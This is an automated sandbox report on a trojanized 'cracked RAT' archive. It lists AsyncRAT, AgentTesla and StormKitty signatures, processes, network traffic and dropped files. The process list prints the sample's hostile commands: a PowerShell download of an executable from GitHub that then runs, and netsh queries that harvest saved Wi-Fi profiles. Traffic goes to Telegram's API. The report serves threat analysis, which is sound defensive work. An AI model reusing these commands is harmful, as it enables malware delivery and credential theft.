Analysis Overview
SHA256
54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Threat Level: Known bad
The file S500 RAT Cracked + Source .rar was found to be: Known bad.
Malicious Activity Summary
Async RAT payload
Arrowrat family
Agenttesla family
StormKitty payload
AgentTesla payload
Stormkitty family
AsyncRat
Asyncrat family
StormKitty
Blocklisted process makes network request
Reads user/profile data of web browsers
Obfuscated with Agile.Net obfuscator
UPX packed file
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up geolocation information via web service
Drops desktop.ini file(s)
Looks up external IP address via web service
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-30 13:55
Signatures
AgentTesla payload
Agenttesla family
Arrowrat family
Async RAT payload
Asyncrat family
StormKitty payload
Stormkitty family
Obfuscated with Agile.Net obfuscator
UPX packed file
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:46
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1573s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2804 wrote to memory of 2896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2804 wrote to memory of 2896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2804 wrote to memory of 2896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
Network
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:18
Platform
win10-20240221-en
Max time kernel
164s
Max time network
169s
Command Line
Signatures
AsyncRat
StormKitty
StormKitty payload
Async RAT payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
C:\Windows\system32\taskhostw.exe
taskhostw.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.110.86.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.184.241:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | api.mylnikov.org | udp |
| US | 104.21.44.66:443 | api.mylnikov.org | tcp |
| US | 8.8.8.8:53 | 241.184.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 66.44.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:8808 | N/A | tcp |
| N/A | 127.0.0.1:7707 | N/A | tcp |
| N/A | 127.0.0.1:8808 | N/A | tcp |
| N/A | 127.0.0.1:7707 | N/A | tcp |
| N/A | 127.0.0.1:7707 | N/A | tcp |
| N/A | 127.0.0.1:8808 | N/A | tcp |
| N/A | 127.0.0.1:7707 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | 4.121.82.140.in-addr.arpa | udp |
| N/A | 127.0.0.1:8808 | N/A | tcp |
| N/A | 127.0.0.1:8808 | N/A | tcp |
| N/A | 127.0.0.1:8808 | N/A | tcp |
Files
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
C:\Users\Admin\Desktop\S500 RAT Cracked\Guna.UI2.dll
C:\Users\Admin\AppData\Local\Temp\c6ef4c2b-9a55-40b4-957b-c3cb74191397\GunaDotNetRT64.dll
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.dll
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stage2.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\PebApi.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Melt.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Emulator.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\register.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop_minimal.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Obfuscator\nop.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Stub.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Download.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\.peu\New Project 1\src\Compression.asm
C:\Users\Admin\Desktop\S500 RAT Cracked\Readme.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Browsers\Firefox\Bookmarks.txt
C:\Users\Admin\Desktop\S500 RAT Cracked\initialization.dll
C:\Users\Admin\Desktop\S500 RAT Cracked\Certificate\ServerCertificate.p12
C:\Users\Admin\Desktop\S500 RAT Cracked\SunnyUI.Common.dll
C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\System\Process.txt
C:\Users\Admin\AppData\Local\1ca9a780f62d391eab5af10e0d5b79d1\msgid.dat
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g1xbvrcg.pvm.ps1
Analysis: behavioral3
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:46
Platform
win10v2004-20240226-en
Max time kernel
425s
Max time network
1153s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4652 wrote to memory of 896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 4652 wrote to memory of 896 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-30 13:53
Reported
2024-03-30 14:46
Platform
win11-20240221-en
Max time kernel
452s
Max time network
1174s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3594324687-1993884830-4019639329-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2332 wrote to memory of 3712 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
| PID 2332 wrote to memory of 3712 | N/A | C:\Windows\system32\cmd.exe | C:\Program Files\7-Zip\7zFM.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 107.211.222.173.in-addr.arpa | udp |